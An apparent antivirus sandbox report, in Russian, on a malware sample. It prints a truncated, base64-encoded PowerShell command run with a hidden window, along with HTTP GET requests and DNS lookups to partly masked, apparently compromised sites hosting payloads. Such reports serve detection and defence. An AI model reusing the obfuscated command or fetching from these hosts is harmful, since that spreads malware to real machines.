Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGIAegBoAHgAZQB4AD0AJwBOAHkAOQAzADAANABoACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAEMAVQByAGkAVABZAGAAcAByAE8AdABPAGMAYABvAGwAIgAgAD0AIAAnAH...
Сетевая активность
TCP
Запросы HTTP GET
- http://tz##5.com/aspnet_client/system_web/upao5_p_i/
- http://nu######rdecistalace.org.br/wp-includes/hnor_qz_n66fskbujg/
- http://m.####ngzyy120.com/mbsz/tg_h9_9tkc5xa2/
- http://id###isoft.pt/istore/xz_nf_fql8v7nx/
- http://www.id###isoft.pt/istore/xz_nf_fql8v7nx/
UDP
- DNS ASK sy####glogin.com
- DNS ASK tz##5.com
- DNS ASK nu######rdecistalace.org.br
- DNS ASK m.####ngzyy120.com
- DNS ASK id###isoft.pt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGIAegBoAHgAZQB4AD0AJwBOAHkAOQAzADAANABoACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAEMAVQByAGkAVABZAGAAcAByAE8AdABPAGMAYABvAGwAIgAgAD0AIAAnAH...' (со скрытым окном)
